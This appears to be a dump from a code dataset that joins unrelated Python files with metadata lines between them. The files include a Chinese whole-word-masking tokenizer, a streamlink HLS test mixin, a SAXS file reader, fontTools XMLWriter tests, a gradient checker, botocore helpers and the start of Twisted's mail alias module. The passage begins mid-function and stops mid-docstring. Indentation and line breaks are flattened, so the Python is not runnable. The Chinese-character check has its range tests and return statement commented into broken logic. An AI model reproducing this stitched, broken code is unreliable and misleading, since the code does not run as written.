"".join(chars[start:end]) if start > 0: substr = "##" + substr if substr.startswith("##"): if _is_chinese_substr(substr): if substr[2:] in self.vocab: # 中文substr cur_substr = substr break else: if substr in self.vocab: cur_substr = substr # 英文substr break else: if substr in self.vocab: # 非substr,可以是字,也可以是整个中文词 cur_substr = substr break end -= 1 if cur_substr is None: is_bad = True break sub_tokens.append(cur_substr) start = end if is_bad: output_tokens.append(self.unk_token) else: output_tokens.extend(sub_tokens) return output_tokens def _is_whitespace(char): """Checks whether `chars` is a whitespace character.""" # \t, \n, and \r are technically contorl characters but we treat them # as whitespace since they are generally considered as such. if char == " " or char == "\t" or char == "\n" or char == "\r": return True cat = unicodedata.category(char) if cat == "Zs": return True return False def _is_control(char): """Checks whether `chars` is a control character.""" # These are technically control characters but we count them as whitespace # characters. if char == "\t" or char == "\n" or char == "\r": return False cat = unicodedata.category(char) if cat in ("Cc", "Cf"): return True return False def _is_punctuation(char): """Checks whether `chars` is a punctuation character.""" cp = ord(char) # We treat all non-letter/number ASCII as punctuation. # Characters such as "^", "$", and "`" are not in the Unicode # Punctuation class but we treat them as punctuation anyways, for # consistency. if ( (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126) ): return True cat = unicodedata.category(char) if cat.startswith("P"): return True return False class BasicTokenizerWithChineseWWM(object): """Runs basic tokenization (punctuation splitting, lower casing, etc.). (nickpan)对中英混杂做了特殊处理,见_tokenize_chinese_chars """ def __init__(self, do_lower_case=True): """Constructs a BasicTokenizer. Args: do_lower_case: Whether to lower case the input. """ try: import jieba self.pre_tokenizer = lambda x: jieba.lcut(x, HMM=False) except ImportError: raise (ImportError("Chinese WWM need jieba")) self.do_lower_case = do_lower_case def tokenize(self, text): """Tokenizes a piece of text.""" text = convert_to_unicode(text) text = self._clean_text(text) # This was added on November 1st, 2018 for the multilingual and Chinese # models. This is also applied to the English models now, but it doesn't # matter since the English models were not trained on any Chinese data # and generally don't have any Chinese data in them (there are Chinese # characters in the vocabulary because Wikipedia does have some Chinese # words in the English Wikipedia.). text = self._tokenize_chinese_chars(text) orig_tokens = whitespace_tokenize(text) split_tokens = [] for token in orig_tokens: if self.do_lower_case: token = token.lower() token = self._run_strip_accents(token) split_tokens.extend(self._run_split_on_punc(token)) output_tokens = whitespace_tokenize(" ".join(split_tokens)) return output_tokens def _run_strip_accents(self, text): """Strips accents from a piece of text.""" text = unicodedata.normalize("NFD", text) output = [] for char in text: cat = unicodedata.category(char) if cat == "Mn": continue output.append(char) return "".join(output) def _run_split_on_punc(self, text): """Splits punctuation on a piece of text.""" chars = list(text) i = 0 start_new_word = True output = [] while i < len(chars): char = chars[i] if _is_punctuation(char): output.append([char]) start_new_word = True else: if start_new_word: output.append([]) start_new_word = False output[-1].append(char) i += 1 return ["".join(x) for x in output] def _tokenize_chinese_chars(self, text): """Adds whitespace around any CJK character. (nickpan)并且如果是纯中文片段,则用jieba分词,否则则保留 两边加空格的操作。 """ output = [] piece = "" for char in text: cp = ord(char) if self._is_chinese_char(cp): piece += char else: chinese_words = self.pre_tokenizer(piece) for word in chinese_words: output.append(" ") output.append(word) output.append(" ") output.append(char) piece = "" chinese_words = self.pre_tokenizer(piece) for word in chinese_words: output.append(" ") output.append(word) output.append(" ") return "".join(output) def _is_chinese_char(self, cp): """Checks whether CP is the codepoint of a CJK character.""" # This defines a "chinese character" as anything in the CJK Unicode block: # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block) # # Note that the CJK Unicode block is NOT all Japanese and Korean characters, # despite its name. The modern Korean Hangul alphabet is a different block, # as is Japanese Hiragana and Katakana. Those alphabets are used to write # space-separated words, so they are not treated specially and handled # like the all of the other languages. if ( (cp >= 0x4E00 and cp <= 0x9FFF) or (cp >= 0x3400 and cp <= 0x4DBF) # or (cp >= 0x20000 and cp <= 0x2A6DF) # or (cp >= 0x2A700 and cp <= 0x2B73F) # or (cp >= 0x2B740 and cp <= 0x2B81F) # or (cp >= 0x2B820 and cp <= 0x2CEAF) # or (cp >= 0xF900 and cp <= 0xFAFF) or (cp >= 0x2F800 and cp <= 0x2FA1F) # ): # return True return False def _clean_text(self, text): """Performs invalid character removal and whitespace cleanup on text.""" output = [] for char in text: cp = ord(char) if cp == 0 or cp == 0xFFFD or _is_control(char): continue if _is_whitespace(char): output.append(" ") else: output.append(char) return "".join(output) def _is_chinese_substr(char): return re.findall("##[\u4E00-\u9FA5]", char)
33.860577
84
0.572673
165b8e8c4b1a7d413d83edb7485f2b41f1ad079a
8,977
py
Python
tests/mixins/stream_hls.py
lijinquan123/streamlink
1e0ff12f38df4879a704c11376b7e2a118a01e3b
[ "BSD-2-Clause" ]
1
2021-07-19T17:25:11.000Z
2021-07-19T17:25:11.000Z
tests/mixins/stream_hls.py
Inncee81/streamlink
07029669d58a835bd05029316211343eef78ddf2
[ "BSD-2-Clause" ]
2
2021-08-06T01:59:11.000Z
2022-01-20T08:27:45.000Z
tests/mixins/stream_hls.py
Inncee81/streamlink
07029669d58a835bd05029316211343eef78ddf2
[ "BSD-2-Clause" ]
1
2021-08-05T12:15:07.000Z
2021-08-05T12:15:07.000Z
import unittest from binascii import hexlify from collections import OrderedDict from functools import partial from threading import Event, Thread import requests_mock from streamlink import Streamlink from streamlink.stream.hls import HLSStream, HLSStreamWriter as _HLSStreamWriter class HLSItemBase: path = "" def url(self, namespace): return "http://mocked/{namespace}/{path}".format(namespace=namespace, path=self.path) class Playlist(HLSItemBase): path = "playlist.m3u8" def __init__(self, mediasequence=None, segments=None, end=False, targetduration=0, version=7): self.items = [ Tag("EXTM3U"), Tag("EXT-X-VERSION", int(version)), Tag("EXT-X-TARGETDURATION", int(targetduration)) ] if mediasequence is not None: # pragma: no branch self.items.append(Tag("EXT-X-MEDIA-SEQUENCE", int(mediasequence))) self.items += segments or [] if end: self.items.append(Tag("EXT-X-ENDLIST")) def build(self, *args, **kwargs): return "\n".join([item.build(*args, **kwargs) for item in self.items]) class Tag(HLSItemBase): def __init__(self, name, attrs=None): self.name = name self.attrs = attrs @classmethod def val_quoted_string(cls, value): return "\"{0}\"".format(value) @classmethod def val_hex(cls, value): return "0x{0}".format(hexlify(value).decode("ascii")) def build(self, *args, **kwargs): attrs = None if type(self.attrs) == dict: attrs = ",".join([ "{0}={1}".format(key, value(self, *args, **kwargs) if callable(value) else value) for (key, value) in self.attrs.items() ]) elif self.attrs is not None: attrs = str(self.attrs) return "#{name}{attrs}".format(name=self.name, attrs=":{0}".format(attrs) if attrs else "") class Segment(HLSItemBase): def __init__(self, num, title=None, duration=None, path_relative=True): self.num = int(num or 0) self.title = str(title or "") self.duration = float(duration or 1) self.path_relative = bool(path_relative) self.content = "[{0}]".format(self.num).encode("ascii") @property def path(self): return "segment{0}.ts".format(self.num) def build(self, namespace): return "#EXTINF:{duration:.3f},{title}\n{path}".format( duration=self.duration, title=self.title, path=self.path if self.path_relative else self.url(namespace) ) class EventedHLSStreamWriter(_HLSStreamWriter): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.write_wait = Event() self.write_done = Event() self.write_error = None def write(self, *args, **kwargs): # only write once per step self.write_wait.wait() self.write_wait.clear() try: # don't write again during teardown if not self.closed: super().write(*args, **kwargs) except Exception as err: self.write_error = err self.reader.close() finally: # notify main thread that writing has finished self.write_done.set() class HLSStreamReadThread(Thread): """ Run the reader on a separate thread, so that each read can be controlled from within the main thread """ def __init__(self, session, stream, *args, **kwargs): """ :param Streamlink session: :param HLSStream stream: """ Thread.__init__(self, *args, **kwargs) self.daemon = True self.read_wait = Event() self.read_once = Event() self.read_done = Event() self.read_all = False self.data = [] self.error = None self.session = session self.stream = stream self.reader = stream.open() # ensure that at least one read was attempted before closing the writer thread early # otherwise, the writer will close the reader's buffer, making it not block on read and yielding empty results def _await_read_then_close(): self.read_once.wait(timeout=5) return self.writer_close() self.writer_close = self.reader.writer.close self.reader.writer.close = _await_read_then_close def run(self): while not self.reader.buffer.closed: # at least one read was attempted self.read_once.set() # only read once per step self.read_wait.wait() self.read_wait.clear() try: # don't read again during teardown # if there is data left, close() was called manually, and it needs to be read if self.reader.buffer.closed and self.reader.buffer.length == 0: return if self.read_all: self.data += list(iter(partial(self.reader.read, -1), b"")) return self.data.append(self.reader.read(-1)) except OSError as err: self.error = err return finally: # notify main thread that reading has finished self.read_done.set() def reset(self): self.data[:] = [] self.error = None class TestMixinStreamHLS(unittest.TestCase): __stream__ = HLSStream __readthread__ = HLSStreamReadThread def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.mocker = requests_mock.Mocker() self.mocks = {} self.session = None self.stream = None self.thread = None def setUp(self): super().setUp() self.mocker.start() def tearDown(self): super().tearDown() self.close_thread() self.mocker.stop() self.mocks.clear() self.session = None self.stream = None self.thread = None def mock(self, method, url, *args, **kwargs): self.mocks[url] = self.mocker.request(method, url, *args, **kwargs) def get_mock(self, item): return self.mocks[self.url(item)] def called(self, item): return self.get_mock(item).called def url(self, item): return item.url(self.id()) def content(self, segments, prop="content", cond=None): return b"".join([getattr(segment, prop) for segment in segments.values() if cond is None or cond(segment)]) # close read thread and make sure that all threads have terminated before moving on def close_thread(self): thread = self.thread if isinstance(thread.reader.writer, EventedHLSStreamWriter): thread.reader.writer.write_wait.set() thread.reader.close() thread.read_wait.set() thread.reader.writer.join() thread.reader.worker.join() thread.join() # make one write call on the write thread and wait until it has finished def await_write(self, write_calls=1, timeout=5): writer = self.thread.reader.writer for _ in range(write_calls): writer.write_wait.set() writer.write_done.wait(timeout) writer.write_done.clear() if writer.write_error: raise writer.write_error # make one read call on the read thread and wait until it has finished def await_read(self, read_all=False, timeout=5): thread = self.thread thread.read_all = read_all thread.read_wait.set() thread.read_done.wait(timeout) thread.read_done.clear() try: if thread.error: raise thread.error return b"".join(thread.data) finally: thread.reset() def get_session(self, options=None, *args, **kwargs): return Streamlink(options) # set up HLS responses, create the session and read thread and start it def subject(self, playlists, options=None, streamoptions=None, threadoptions=None, *args, **kwargs): # filter out tags and duplicate segments between playlist responses while keeping index order segments_all = [item for playlist in playlists for item in playlist.items if isinstance(item, Segment)] segments = OrderedDict([(segment.num, segment) for segment in segments_all]) self.mock("GET", self.url(playlists[0]), [{"text": pl.build(self.id())} for pl in playlists]) for segment in segments.values(): self.mock("GET", self.url(segment), content=segment.content) self.session = self.get_session(options, *args, **kwargs) self.stream = self.__stream__(self.session, self.url(playlists[0]), **(streamoptions or {})) self.thread = self.__readthread__(self.session, self.stream, **(threadoptions or {})) self.thread.start() return self.thread, segments
33.621723
118
0.606439
a206535b45dc6caa78816eab68b6a1b1b1654290
9,080
py
Python
scripts/saxs_open.py
cristina-mt/biosoft_SAXS
1d4f4dea5dfb5ef57089e5450a2f3504547c0f24
[ "MIT" ]
null
null
null
scripts/saxs_open.py
cristina-mt/biosoft_SAXS
1d4f4dea5dfb5ef57089e5450a2f3504547c0f24
[ "MIT" ]
null
null
null
scripts/saxs_open.py
cristina-mt/biosoft_SAXS
1d4f4dea5dfb5ef57089e5450a2f3504547c0f24
[ "MIT" ]
null
null
null
""" Group of functions to read and display raw data generated from SAXS experiments at the ESRF - poni file: calibration information - mask file: identifies the detector lines and beam stopper - edf file: contains the saxs data Notes: - Mask is read either from txt file generated with matlab code, or edf file. - EDF file is read in the simplest form possible. Adapted from the matlab code by the saxs team. It's possible it doesn't read all the files. If this is true, more options need to be added Created on Fri Nov 24 2017 Last modification on Mon Jan 8 2018 version: 0.0 @author: Cristina MT """ class OpenSAXS(): """ Opens the different types of data generated from SAXS experiments: - poni file (.poni) : can be read in a text editor - mask file (.msk): binary file, in bits - edf file (.edf) : header text + data in binary format, bytes """ def read_poni(filename): """ Defines function to read the poni file whose name is [filename] [filename] is a string variable containing the full path of the file, including the file extension Output: [cal_info] dictionary containing the calibration information Typically, it contains the following keys: - PixelSize1 , PixelSize2 - Distance - Poni1 , Poni2 - Rot1 , Rot2 , Rot3 (not used) - Wavelength Note: 1 refers to X axis, 2 refers to Y axis """ cal_info = dict() try: with open(filename, 'r') as f: file_data = f.readlines() # Read and store all file content at once for line in file_data: if line[0] != '#': # Discard the comment lines ind_sep = line.find(':') # ':' delimits the key name, and its value if ind_sep > 0: # make sure it's a variable, and not blank key_name = line[0:ind_sep] key_value = line[ind_sep+2:-1] cal_info[key_name] = key_value except FileNotFoundError: print('Error File Does Not Exist: '+filename) return cal_info def read_mask_msk(filename): """ Defines function to read the mask file whose name is [filename] [filename] is a string variable containing the full path of the file, including the file extension Output: [mask] numpy 2D array with 0|1 values Warning: do not use! issue with reading file as bits - arbitrary offsets? to be checked note: adapted from B.Vos CreateMask matlab code (matlab does have a bultin function to read bits) """ import numpy as np mask_bytes = np.fromfile(filename, 'uint8') # smallest info numpy reads is bytes mask_bits = np.unpackbits(mask_bytes) # convert bytes to bits # Arbitrary offsets, obtained by trial/error to match SAXS data array shape xo = 11 ; yo = 8 offset = (1043+yo)*(981+xo) # Reshape the string of bits into a 2D array mask = mask_bits[245:245+offset].reshape([1043+yo, 981+xo])[yo:,xo:] return mask def read_mask_txt(filename): """ Defines function to read the mask file whose name is [filename] [filename] is a string variable containing the full path of the file, including the file extension Important: Mask should be in txt format Output: [mask] numpy 2D array with 0|1 values """ import numpy as np mask_raw = np.loadtxt(filename, delimiter = ',') # mask in txt is saved with xy inverted mask = mask_raw.transpose() return mask def read_mask_edf(filename): """ Defines function to read the mask file whose name is [filename] [filename] is a string variable containing the full path of the file, including the file extension Important: Mask should be in edf format Output: [mask] numpy 2D array with 0|1 values """ import numpy as np mask_bytes = np.fromfile(filename, 'uint8') # mask is saved as unsigned byte offset = 1024 # Arbitrary offset, obtained by trial/error to match SAXS data array shape mask = mask_bytes[offset:].reshape(1043, 981) # Reshape the string of bytes into a 2D array return mask def read_edf(filename): """ Defines function to read the edf file whose name is [filename] [filename] is a string variable containing the full path of the file, including the file extension Output: [header_info] dictionary with all the information in file header [image] numpy 2D array containing the SAXS data """ import numpy as np import codecs header_info = dict() image = [] try: read_line = 1 # Variable used to stop reading file when header is finished. # Reads file line by line to extract information from the header. with codecs.open(filename, "r",encoding='utf-8', errors='replace') as f: f.readline() while read_line == 1: line = f.readline() ind_sep = line.find('=') # '=' delimits the key name from its value. if ind_sep > 0: # make sure there's a variable, and not empty/binary. key_name = line[0:ind_sep-1] key_value = line[ind_sep+2:-3] header_info[key_name] = key_value else: read_line = 0 # if '=' is not found, the header is over, stop reading. # Read the file into a numpy array. if header_info.get('DataType') == 'SignedInteger': # Condition extracted from matlab code. There are other options available. dt = 'int32' data = np.fromfile(filename, dtype = dt, count = int(header_info['Size'])) # Read the file as [dt] type, stop when the [Size] reported in header is reached. # Get XY dimensions for the 2D array xdim = int(header_info.get('Dim_1')) ydim = int(header_info.get('Dim_2')) # Reshape the 1D array into correct dimensions. The 512 offset is arbitrary obtained by trial/error image = data[512:].reshape(ydim, xdim) else: print('['+header_info.get('DataType')+'] data type not known') # If the data type is not 'SignedInteger', but header can be read except FileNotFoundError: print('Error File Does Not Exist: '+filename) return image, header_info class ShowSAXS(): """ Displays the different types of raw data read with OpenSAXS class: - mask: binary array - image: SAXS data array Note: Each time a function is called, it creates a new figure """ def raw_img(saxs_image, vmin = None, vmax = None, show_center = None, log_scale = None, colormap = None): """ Defines function that shows the raw SAXS data image contained in the [saxs_image] 2D numpy array. [vmin] is the value minimum for the colorscale. By default is the minimum of the array [vmax] same as [vmin] but for the maximum value [show_center] is an array [x,y] . If 'None' , it doesn't show the center of the beam [log_scale] By default it applies the np.log of SAXS data. Use False to prevent this [colormap] By default is 'inferno'. Accepts any other matplotlib colormap name as a string """ import numpy as np import matplotlib.pyplot as plt plt.figure() # Configure display according to options if log_scale == None: image = np.log(saxs_image) elif log_scale == False: image = 1.*saxs_image if colormap == None: cmap_choice = 'inferno' else: cmap_choice = colormap if vmin == None: v1 = np.min(image.flatten()) else: v1 = vmin if vmax == None: v2 = np.max(image.flatten()) else: v2 = vmax # Plot image and center, if applicable plt.imshow(image, cmap = cmap_choice, interpolation = 'none', vmin = v1, vmax = v2) if show_center != None: plt.plot([0, image.shape[1]],[show_center[1], show_center[1]], '--', c = 'cyan') plt.plot([show_center[0], show_center[0]],[0, image.shape[0]], '--', c = 'cyan') plt.xlim([0, image.shape[1]]) plt.ylim([image.shape[0], 0]) #plt.show() def mask(mask_array, show_center = None): """ Defines function that shows the [mask_array] 2D numpy array used to discard the detector lines and beam stopper. [show_center] is an array [x,y] . If 'None' , it doesn't show the center of the beam """ import matplotlib.pyplot as plt # Plot image and center, if applicable plt.figure(); plt.imshow(mask_array, cmap = 'gray', interpolation = 'none') if show_center != None: plt.plot([0, mask_array.shape[1]],[show_center[1], show_center[1]], '--', c = 'cyan') plt.plot([show_center[0], show_center[0]],[0, mask_array.shape[0]], '--', c = 'cyan') plt.xlim([0, mask_array.shape[1]]) plt.ylim([mask_array.shape[0], 0]) #plt.show() def img_wmask(saxs_image, mask, vmin = None, vmax = None, show_center = None, log_scale = None, colormap = None, alpha = None): """ Combines the function ShowSAXS.raw_img() and ShowSAXS.mask() into one, to show the mask overlayed on the image, using [alpha] as transparecy value. [alpha] can take values 0 - 1.0. Default is 0.5 Warning: Display might be too slow and could block python, depending on how is it running Function to use carefully """ import matplotlib.pyplot as plt #plt.ion() ShowSAXS.raw_img(saxs_image, vmin, vmax, show_center, log_scale, colormap) if alpha == None: a_value = 0.5 else: a_value = alpha # manipulate the mask for diaplay purposes mask_new = 1.*mask mask_new[mask==0] = float('nan') plt.imshow(mask_new, interpolation = 'none', alpha = a_value, vmin = 0, vmax = 1, cmap = 'Reds')
33.382353
139
0.690419
74839ed5664567bbda6e44f085c0f79bc643e6ea
699
py
Python
tensorflow_datasets/question_answering/coqa/__init__.py
shubhamkumaR630/datasets
fe9ee91849cefed0953141ea3588f73b7def78fd
[ "Apache-2.0" ]
2
2022-02-14T09:51:39.000Z
2022-02-14T13:27:49.000Z
tensorflow_datasets/question_answering/coqa/__init__.py
shubhamkumaR630/datasets
fe9ee91849cefed0953141ea3588f73b7def78fd
[ "Apache-2.0" ]
null
null
null
tensorflow_datasets/question_answering/coqa/__init__.py
shubhamkumaR630/datasets
fe9ee91849cefed0953141ea3588f73b7def78fd
[ "Apache-2.0" ]
1
2020-12-13T22:11:33.000Z
2020-12-13T22:11:33.000Z
# coding=utf-8 # Copyright 2022 The TensorFlow Datasets Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """coqa dataset.""" from tensorflow_datasets.question_answering.coqa.coqa import Coqa
36.789474
74
0.76824
fd0ba89a2c0e0fa8bbb68a04f8ee3631e85ffd36
4,263
py
Python
Tests/misc/xmlWriter_test.py
anntzer/fonttools
726cd67549956b985bbbe83e26fb0af9da59ddf7
[ "MIT", "BSD-3-Clause" ]
1
2020-05-07T16:29:02.000Z
2020-05-07T16:29:02.000Z
Tests/misc/xmlWriter_test.py
anntzer/fonttools
726cd67549956b985bbbe83e26fb0af9da59ddf7
[ "MIT", "BSD-3-Clause" ]
74
2020-01-30T07:27:54.000Z
2021-08-03T05:47:17.000Z
Tests/misc/xmlWriter_test.py
anntzer/fonttools
726cd67549956b985bbbe83e26fb0af9da59ddf7
[ "MIT", "BSD-3-Clause" ]
1
2020-01-22T20:06:09.000Z
2020-01-22T20:06:09.000Z
from fontTools.misc.py23 import * import os import unittest from fontTools.misc.xmlWriter import XMLWriter linesep = tobytes(os.linesep) HEADER = b'<?xml version="1.0" encoding="UTF-8"?>' + linesep class TestXMLWriter(unittest.TestCase): def test_comment_escaped(self): writer = XMLWriter(BytesIO()) writer.comment("This&that are <comments>") self.assertEqual(HEADER + b"<!-- This&amp;that are &lt;comments&gt; -->", writer.file.getvalue()) def test_comment_multiline(self): writer = XMLWriter(BytesIO()) writer.comment("Hello world\nHow are you?") self.assertEqual(HEADER + b"<!-- Hello world" + linesep + b" How are you? -->", writer.file.getvalue()) def test_encoding_default(self): writer = XMLWriter(BytesIO()) self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep, writer.file.getvalue()) def test_encoding_utf8(self): # https://github.com/fonttools/fonttools/issues/246 writer = XMLWriter(BytesIO(), encoding="utf8") self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep, writer.file.getvalue()) def test_encoding_UTF_8(self): # https://github.com/fonttools/fonttools/issues/246 writer = XMLWriter(BytesIO(), encoding="UTF-8") self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep, writer.file.getvalue()) def test_encoding_UTF8(self): # https://github.com/fonttools/fonttools/issues/246 writer = XMLWriter(BytesIO(), encoding="UTF8") self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep, writer.file.getvalue()) def test_encoding_other(self): self.assertRaises(Exception, XMLWriter, BytesIO(), encoding="iso-8859-1") def test_write(self): writer = XMLWriter(BytesIO()) writer.write("foo&bar") self.assertEqual(HEADER + b"foo&amp;bar", writer.file.getvalue()) def test_indent_dedent(self): writer = XMLWriter(BytesIO()) writer.write("foo") writer.newline() writer.indent() writer.write("bar") writer.newline() writer.dedent() writer.write("baz") self.assertEqual(HEADER + bytesjoin(["foo", " bar", "baz"], linesep), writer.file.getvalue()) def test_writecdata(self): writer = XMLWriter(BytesIO()) writer.writecdata("foo&bar") self.assertEqual(HEADER + b"<![CDATA[foo&bar]]>", writer.file.getvalue()) def test_simpletag(self): writer = XMLWriter(BytesIO()) writer.simpletag("tag", a="1", b="2") self.assertEqual(HEADER + b'<tag a="1" b="2"/>', writer.file.getvalue()) def test_begintag_endtag(self): writer = XMLWriter(BytesIO()) writer.begintag("tag", attr="value") writer.write("content") writer.endtag("tag") self.assertEqual(HEADER + b'<tag attr="value">content</tag>', writer.file.getvalue()) def test_dumphex(self): writer = XMLWriter(BytesIO()) writer.dumphex("Type is a beautiful group of letters, not a group of beautiful letters.") self.assertEqual(HEADER + bytesjoin([ "54797065 20697320 61206265 61757469", "66756c20 67726f75 70206f66 206c6574", "74657273 2c206e6f 74206120 67726f75", "70206f66 20626561 75746966 756c206c", "65747465 72732e ", ""], joiner=linesep), writer.file.getvalue()) def test_stringifyattrs(self): writer = XMLWriter(BytesIO()) expected = ' attr="0"' self.assertEqual(expected, writer.stringifyattrs(attr=0)) self.assertEqual(expected, writer.stringifyattrs(attr=b'0')) self.assertEqual(expected, writer.stringifyattrs(attr='0')) self.assertEqual(expected, writer.stringifyattrs(attr=u'0')) def test_carriage_return_escaped(self): writer = XMLWriter(BytesIO()) writer.write("two lines\r\nseparated by Windows line endings") self.assertEqual( HEADER + b'two lines&#13;\nseparated by Windows line endings', writer.file.getvalue()) def test_newlinestr(self): header = b'<?xml version="1.0" encoding="UTF-8"?>' for nls in (None, '\n', '\r\n', '\r', ''): writer = XMLWriter(BytesIO(), newlinestr=nls) writer.write("hello") writer.newline() writer.write("world") writer.newline() linesep = tobytes(os.linesep) if nls is None else tobytes(nls) self.assertEqual( header + linesep + b"hello" + linesep + b"world" + linesep, writer.file.getvalue()) if __name__ == '__main__': import sys sys.exit(unittest.main())
33.304688
99
0.696223
b89bcabfdc13ad72fede6d69e6c776c12e99dcf8
2,526
py
Python
cs224n/assignment1/q2_gradcheck.py
Rolight/Mooc-Assignments
0031771c0662426af3cf9935051e3d35d08cca20
[ "Apache-2.0" ]
null
null
null
cs224n/assignment1/q2_gradcheck.py
Rolight/Mooc-Assignments
0031771c0662426af3cf9935051e3d35d08cca20
[ "Apache-2.0" ]
null
null
null
cs224n/assignment1/q2_gradcheck.py
Rolight/Mooc-Assignments
0031771c0662426af3cf9935051e3d35d08cca20
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python import numpy as np import random # First implement a gradient checker by filling in the following functions def gradcheck_naive(f, x): """ Gradient check for a function f. Arguments: f -- a function that takes a single argument and outputs the cost and its gradients x -- the point (numpy array) to check the gradient at """ rndstate = random.getstate() random.setstate(rndstate) fx, grad = f(x) # Evaluate function value at original point h = 1e-4 # Do not change this! # Iterate over all indexes in x it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite']) while not it.finished: ix = it.multi_index # Try modifying x[ix] with h defined above to compute # numerical gradients. Make sure you call random.setstate(rndstate) # before calling f(x) each time. This will make it possible # to test cost functions with built in randomness later. ### YOUR CODE HERE: x = x.astype(float) x[ix] += h random.setstate(rndstate) fx1, grad1 = f(x) x[ix] -= 2 * h random.setstate(rndstate) fx2, grad2 = f(x) x[ix] += h numgrad = (fx1 - fx2) / (2 * h) ### END YOUR CODE # Compare gradients reldiff = abs(numgrad - grad[ix]) / max(1, abs(numgrad), abs(grad[ix])) if reldiff > 1e-5: print "Gradient check failed." print "First gradient error found at index %s" % str(ix) print "Your gradient: %f \t Numerical gradient: %f" % ( grad[ix], numgrad) return it.iternext() # Step to next dimension print "Gradient check passed!" def sanity_check(): """ Some basic sanity checks. """ quad = lambda x: (np.sum(x ** 2), x * 2) print "Running sanity checks..." gradcheck_naive(quad, np.array(123.456)) # scalar test gradcheck_naive(quad, np.random.randn(3,)) # 1-D test gradcheck_naive(quad, np.random.randn(4,5)) # 2-D test print "" def your_sanity_checks(): """ Use this space add any additional sanity checks by running: python q2_gradcheck.py This function will not be called by the autograder, nor will your additional tests be graded. """ print "Running your sanity checks..." ### YOUR CODE HERE # raise NotImplementedError ### END YOUR CODE if __name__ == "__main__": sanity_check() your_sanity_checks()
28.382022
79
0.605305
3e824d1cdcc28656b403fbacbfa69acc3f0f6088
105
py
Python
pyecore/__init__.py
afonsobspinto/pyecore
a741243c68d1b6d3ed383165493531827d9c4c02
[ "BSD-3-Clause" ]
null
null
null
pyecore/__init__.py
afonsobspinto/pyecore
a741243c68d1b6d3ed383165493531827d9c4c02
[ "BSD-3-Clause" ]
null
null
null
pyecore/__init__.py
afonsobspinto/pyecore
a741243c68d1b6d3ed383165493531827d9c4c02
[ "BSD-3-Clause" ]
null
null
null
""" """ from .utils import install_issubclass_patch __version__ = "0.8.6" install_issubclass_patch()
10.5
43
0.733333
472f1f253f59e246ccf368725276c3e53bb61fc4
1,415
py
Python
trailscraper/boto_service_definitions.py
flosell/trailscraper
511a073ae75bba1cc4dd7b6bea1d51a70d95ad48
[ "Apache-2.0" ]
497
2018-01-08T15:36:05.000Z
2022-03-30T14:11:54.000Z
trailscraper/boto_service_definitions.py
flosell/trailscraper
511a073ae75bba1cc4dd7b6bea1d51a70d95ad48
[ "Apache-2.0" ]
97
2017-11-26T13:52:20.000Z
2022-02-07T01:36:10.000Z
trailscraper/boto_service_definitions.py
flosell/trailscraper
511a073ae75bba1cc4dd7b6bea1d51a70d95ad48
[ "Apache-2.0" ]
26
2019-04-04T21:37:29.000Z
2022-02-18T10:23:07.000Z
"""Helper Methods to get service definition information out of the boto library""" import fnmatch import json import os from pkg_resources import resource_filename, Requirement def boto_service_definition_files(): """Return paths to all service definition files from botocore""" botocore_data_dir = resource_filename(Requirement.parse("botocore"), "botocore/data") files = [os.path.join(dirname, file_in_dir) for dirname, _, files_in_dir in os.walk(botocore_data_dir) for file_in_dir in files_in_dir if fnmatch.fnmatch(file_in_dir, 'service-*.json')] return files def service_definition_file(servicename): """Returns the path to the most recent service definition file for a service""" boto_service_definition_files() service_definitions_for_service = fnmatch.filter(boto_service_definition_files(), "**/" + servicename + "/*/service-*.json") service_definitions_for_service.sort() return service_definitions_for_service[-1] def operation_definition(servicename, operationname): """Returns the operation definition for a specific service and operation""" with open(service_definition_file(servicename), encoding="UTF-8") as definition_file: service_definition = json.loads(definition_file.read()) return service_definition['operations'][operationname]
38.243243
95
0.722968
cf6d727a692de15f339561a2cfe745e1d84ac42a
25,305
py
Python
IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py
timkrentz/SunTracker
9a189cc38f45e5fbc4e4c700d7295a871d022795
[ "MIT" ]
4
2016-03-30T14:31:52.000Z
2019-02-02T05:01:32.000Z
IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py
timkrentz/SunTracker
9a189cc38f45e5fbc4e4c700d7295a871d022795
[ "MIT" ]
1
2020-03-06T04:49:42.000Z
2020-03-06T04:49:42.000Z
IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py
timkrentz/SunTracker
9a189cc38f45e5fbc4e4c700d7295a871d022795
[ "MIT" ]
2
2019-08-30T23:36:13.000Z
2019-11-08T16:52:01.000Z
# -*- test-case-name: twisted.mail.test.test_mail -*- # # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Support for aliases(5) configuration files. @author: Jp Calderone """ import os import tempfile from twisted.mail import smtp from twisted.internet import reactor from twisted.internet import protocol from twisted.internet import defer from twisted.python import failure from twisted.python import log from zope.interface import implements, Interface def handle(result, line, filename, lineNo): """ Parse a line from an aliases file. @type result: L{dict} mapping L{bytes} to L{list} of L{bytes} @param result: A dictionary mapping username to aliases to which the results of parsing the line are added. @type line: L{bytes} @param line: A line from an aliases file. @type filename: L{bytes} @param filename: The full or relative path to the aliases file. @type lineNo: L{int} @param lineNo: The position of the line within the aliases file. """ parts = [p.strip() for p in line.split(':', 1)] if len(parts) != 2: fmt = "Invalid format on line %d of alias file %s." arg = (lineNo, filename) log.err(fmt % arg) else: user, alias = parts result.setdefault(user.strip(), []).extend(map(str.strip, alias.split(','))) def loadAliasFile(domains, filename=None, fp=None): """ Load a file containing email aliases. Lines in the file should be formatted like so:: username: alias1, alias2, ..., 